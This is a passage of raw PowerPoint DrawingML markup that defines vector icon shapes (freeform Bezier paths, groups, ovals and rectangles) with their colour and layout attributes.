                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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31" name="Freeform 1864">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAA4A53-1C8E-46A3-822D-F277B1D88D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363" y="1229"/>
                    <a:ext cx="343" cy="269"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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DDDDDD">
                          <a:gamma/>
                          <a:tint val="58431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32" name="Freeform 1865">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC8C377-A2F1-4FE9-9B5E-B8661CD5CE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440" y="1214"/>
                    <a:ext cx="89" cy="56"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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33" name="Oval 1866">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D483F5-3641-45B8-9716-5C7ED191B5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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2429" y="1132"/>
                    <a:ext cx="119" cy="119"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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16" name="Group 1867">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECF44D7-4E93-4B95-9A0B-086C905C11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57" y="1924"/>
                <a:ext cx="318" cy="318"/>
                <a:chOff x="1613" y="2865"/>
                <a:chExt cx="318" cy="318"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2617" name="Rectangle 1868">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A5AF12-4F7F-47A9-9E7F-20728E892D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1891" y="3143"/>
                  <a:ext cx="40" cy="40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618" name="Rectangle 1869">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C44EB9D-0D2B-496D-B34F-19CBA2A2B4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1810" y="3062"/>
                  <a:ext cx="71" cy="71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2619" name="Group 1870">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{131AC77B-C0F0-4A06-A570-7804343F8F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13" y="2865"/>
                  <a:ext cx="187" cy="187"/>
                  <a:chOff x="1209" y="2983"/>
                  <a:chExt cx="109" cy="109"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2620" name="Rectangle 1871">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1505348D-25E1-4681-9A03-082E6CE6F8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gray">
                  <a:xfrm>
                    <a:off x="1209" y="2983"/>
                    <a:ext cx="109" cy="109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1B171B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621" name="Group 1872">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A12746A-A847-48A2-90E1-F9A47B5846E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224" y="3000"/>
                    <a:ext cx="79" cy="75"/>
                    <a:chOff x="1461" y="3602"/>
                    <a:chExt cx="187" cy="181"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2622" name="Freeform 1873">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F865CD6-27D3-479F-A160-995FECE9B4E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598" y="3602"/>
                      <a:ext cx="17" cy="168"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 23"/>
                        <a:gd name="T1" fmla="*/ 0 h 222"/>
                        <a:gd name="T2" fmla="*/ 0 w 23"/>
                        <a:gd name="T3" fmla="*/ 220 h 222"/>
                        <a:gd name="T4" fmla="*/ 23 w 23"/>
                        <a:gd name="T5" fmla="*/ 222 h 222"/>
                        <a:gd name="T6" fmla="*/ 23 w 23"/>
                        <a:gd name="T7" fmla="*/ 2 h 222"/>
                        <a:gd name="T8" fmla="*/ 0 w 23"/>
                        <a:gd name="T9" fmla="*/ 0 h 22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3" h="222">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="221"/>
                            <a:pt x="17" y="221"/>
                            <a:pt x="23" y="222"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="23" y="2"/>
                            <a:pt x="23" y="2"/>
                            <a:pt x="23" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="17" y="1"/>
                            <a:pt x="9" y="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1B171B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23" name="Freeform 1874">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA27251-A88C-42B6-8C1A-2B01C378C45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461" y="3602"/>
                      <a:ext cx="124" cy="181"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 105 w 163"/>
                        <a:gd name="T1" fmla="*/ 6 h 240"/>
                        <a:gd name="T2" fmla="*/ 0 w 163"/>
                        <a:gd name="T3" fmla="*/ 6 h 240"/>
                        <a:gd name="T4" fmla="*/ 0 w 163"/>
                        <a:gd name="T5" fmla="*/ 226 h 240"/>
                        <a:gd name="T6" fmla="*/ 106 w 163"/>
                        <a:gd name="T7" fmla="*/ 226 h 240"/>
                        <a:gd name="T8" fmla="*/ 163 w 163"/>
                        <a:gd name="T9" fmla="*/ 220 h 240"/>
                        <a:gd name="T10" fmla="*/ 163 w 163"/>
                        <a:gd name="T11" fmla="*/ 0 h 240"/>
                        <a:gd name="T12" fmla="*/ 105 w 163"/>
                        <a:gd name="T13" fmla="*/ 6 h 24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163" h="240">
                          <a:moveTo>
                            <a:pt x="105" y="6"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="20"/>
                            <a:pt x="0" y="6"/>
                            <a:pt x="0" y="6"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="226"/>
                            <a:pt x="0" y="226"/>
                            <a:pt x="0" y="226"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="226"/>
                            <a:pt x="51" y="240"/>
                            <a:pt x="106" y="226"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="126" y="221"/>
                            <a:pt x="146" y="220"/>
                            <a:pt x="163" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="163" y="0"/>
                            <a:pt x="163" y="0"/>
                            <a:pt x="163" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="146" y="0"/>
                            <a:pt x="126" y="1"/>
                            <a:pt x="105" y="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1B171B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24" name="Freeform 1875">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9AF7F3-B7E1-49DF-845C-F2DC5EBB8F6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629" y="3602"/>
                      <a:ext cx="19" cy="171"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 24 w 24"/>
                        <a:gd name="T1" fmla="*/ 5 h 225"/>
                        <a:gd name="T2" fmla="*/ 0 w 24"/>
                        <a:gd name="T3" fmla="*/ 0 h 225"/>
                        <a:gd name="T4" fmla="*/ 0 w 24"/>
                        <a:gd name="T5" fmla="*/ 220 h 225"/>
                        <a:gd name="T6" fmla="*/ 24 w 24"/>
                        <a:gd name="T7" fmla="*/ 225 h 225"/>
                        <a:gd name="T8" fmla="*/ 24 w 24"/>
                        <a:gd name="T9" fmla="*/ 5 h 22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" h="225">
                          <a:moveTo>
                            <a:pt x="24" y="5"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="24" y="5"/>
                            <a:pt x="15" y="2"/>
                            <a:pt x="0" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                            <a:pt x="0" y="220"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="222"/>
                            <a:pt x="24" y="225"/>
                            <a:pt x="24" y="225"/>
                          </a:cubicBezTo>
                          <a:lnTo>
                            <a:pt x="24" y="5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1B171B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25" name="Freeform 1876">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864BB571-63B6-4525-8EC7-28E59D4491B7}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="1476" y="3647"/>
                      <a:ext cx="84" cy="90"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 83 w 109"/>
                        <a:gd name="T1" fmla="*/ 23 h 119"/>
                        <a:gd name="T2" fmla="*/ 74 w 109"/>
                        <a:gd name="T3" fmla="*/ 78 h 119"/>
                        <a:gd name="T4" fmla="*/ 73 w 109"/>
                        <a:gd name="T5" fmla="*/ 80 h 119"/>
                        <a:gd name="T6" fmla="*/ 74 w 109"/>
                        <a:gd name="T7" fmla="*/ 82 h 119"/>
                        <a:gd name="T8" fmla="*/ 76 w 109"/>
                        <a:gd name="T9" fmla="*/ 83 h 119"/>
                        <a:gd name="T10" fmla="*/ 84 w 109"/>
                        <a:gd name="T11" fmla="*/ 80 h 119"/>
                        <a:gd name="T12" fmla="*/ 94 w 109"/>
                        <a:gd name="T13" fmla="*/ 68 h 119"/>
                        <a:gd name="T14" fmla="*/ 98 w 109"/>
                        <a:gd name="T15" fmla="*/ 49 h 119"/>
                        <a:gd name="T16" fmla="*/ 87 w 109"/>
                        <a:gd name="T17" fmla="*/ 20 h 119"/>
                        <a:gd name="T18" fmla="*/ 58 w 109"/>
                        <a:gd name="T19" fmla="*/ 10 h 119"/>
                        <a:gd name="T20" fmla="*/ 33 w 109"/>
                        <a:gd name="T21" fmla="*/ 16 h 119"/>
                        <a:gd name="T22" fmla="*/ 16 w 109"/>
                        <a:gd name="T23" fmla="*/ 34 h 119"/>
                        <a:gd name="T24" fmla="*/ 11 w 109"/>
                        <a:gd name="T25" fmla="*/ 60 h 119"/>
                        <a:gd name="T26" fmla="*/ 24 w 109"/>
                        <a:gd name="T27" fmla="*/ 96 h 119"/>
                        <a:gd name="T28" fmla="*/ 57 w 109"/>
                        <a:gd name="T29" fmla="*/ 109 h 119"/>
                        <a:gd name="T30" fmla="*/ 76 w 109"/>
                        <a:gd name="T31" fmla="*/ 105 h 119"/>
                        <a:gd name="T32" fmla="*/ 94 w 109"/>
                        <a:gd name="T33" fmla="*/ 96 h 119"/>
                        <a:gd name="T34" fmla="*/ 109 w 109"/>
                        <a:gd name="T35" fmla="*/ 96 h 119"/>
                        <a:gd name="T36" fmla="*/ 97 w 109"/>
                        <a:gd name="T37" fmla="*/ 106 h 119"/>
                        <a:gd name="T38" fmla="*/ 79 w 109"/>
                        <a:gd name="T39" fmla="*/ 115 h 119"/>
                        <a:gd name="T40" fmla="*/ 57 w 109"/>
                        <a:gd name="T41" fmla="*/ 119 h 119"/>
                        <a:gd name="T42" fmla="*/ 28 w 109"/>
                        <a:gd name="T43" fmla="*/ 111 h 119"/>
                        <a:gd name="T44" fmla="*/ 7 w 109"/>
                        <a:gd name="T45" fmla="*/ 90 h 119"/>
                        <a:gd name="T46" fmla="*/ 0 w 109"/>
                        <a:gd name="T47" fmla="*/ 60 h 119"/>
                        <a:gd name="T48" fmla="*/ 7 w 109"/>
                        <a:gd name="T49" fmla="*/ 29 h 119"/>
                        <a:gd name="T50" fmla="*/ 28 w 109"/>
                        <a:gd name="T51" fmla="*/ 7 h 119"/>
                        <a:gd name="T52" fmla="*/ 58 w 109"/>
                        <a:gd name="T53" fmla="*/ 0 h 119"/>
                        <a:gd name="T54" fmla="*/ 94 w 109"/>
                        <a:gd name="T55" fmla="*/ 13 h 119"/>
                        <a:gd name="T56" fmla="*/ 109 w 109"/>
                        <a:gd name="T57" fmla="*/ 49 h 119"/>
                        <a:gd name="T58" fmla="*/ 103 w 109"/>
                        <a:gd name="T59" fmla="*/ 73 h 119"/>
                        <a:gd name="T60" fmla="*/ 87 w 109"/>
                        <a:gd name="T61" fmla="*/ 90 h 119"/>
                        <a:gd name="T62" fmla="*/ 72 w 109"/>
                        <a:gd name="T63" fmla="*/ 95 h 119"/>
                        <a:gd name="T64" fmla="*/ 64 w 109"/>
                        <a:gd name="T65" fmla="*/ 93 h 119"/>
                        <a:gd name="T66" fmla="*/ 60 w 109"/>
                        <a:gd name="T67" fmla="*/ 87 h 119"/>
                        <a:gd name="T68" fmla="*/ 52 w 109"/>
                        <a:gd name="T69" fmla="*/ 93 h 119"/>
                        <a:gd name="T70" fmla="*/ 43 w 109"/>
                        <a:gd name="T71" fmla="*/ 95 h 119"/>
                        <a:gd name="T72" fmla="*/ 27 w 109"/>
                        <a:gd name="T73" fmla="*/ 87 h 119"/>
                        <a:gd name="T74" fmla="*/ 20 w 109"/>
                        <a:gd name="T75" fmla="*/ 65 h 119"/>
                        <a:gd name="T76" fmla="*/ 29 w 109"/>
                        <a:gd name="T77" fmla="*/ 35 h 119"/>
                        <a:gd name="T78" fmla="*/ 51 w 109"/>
                        <a:gd name="T79" fmla="*/ 21 h 119"/>
                        <a:gd name="T80" fmla="*/ 60 w 109"/>
                        <a:gd name="T81" fmla="*/ 23 h 119"/>
                        <a:gd name="T82" fmla="*/ 67 w 109"/>
                        <a:gd name="T83" fmla="*/ 31 h 119"/>
                        <a:gd name="T84" fmla="*/ 69 w 109"/>
                        <a:gd name="T85" fmla="*/ 23 h 119"/>
                        <a:gd name="T86" fmla="*/ 83 w 109"/>
                        <a:gd name="T87" fmla="*/ 23 h 119"/>
                        <a:gd name="T88" fmla="*/ 35 w 109"/>
                        <a:gd name="T89" fmla="*/ 69 h 119"/>
                        <a:gd name="T90" fmla="*/ 39 w 109"/>
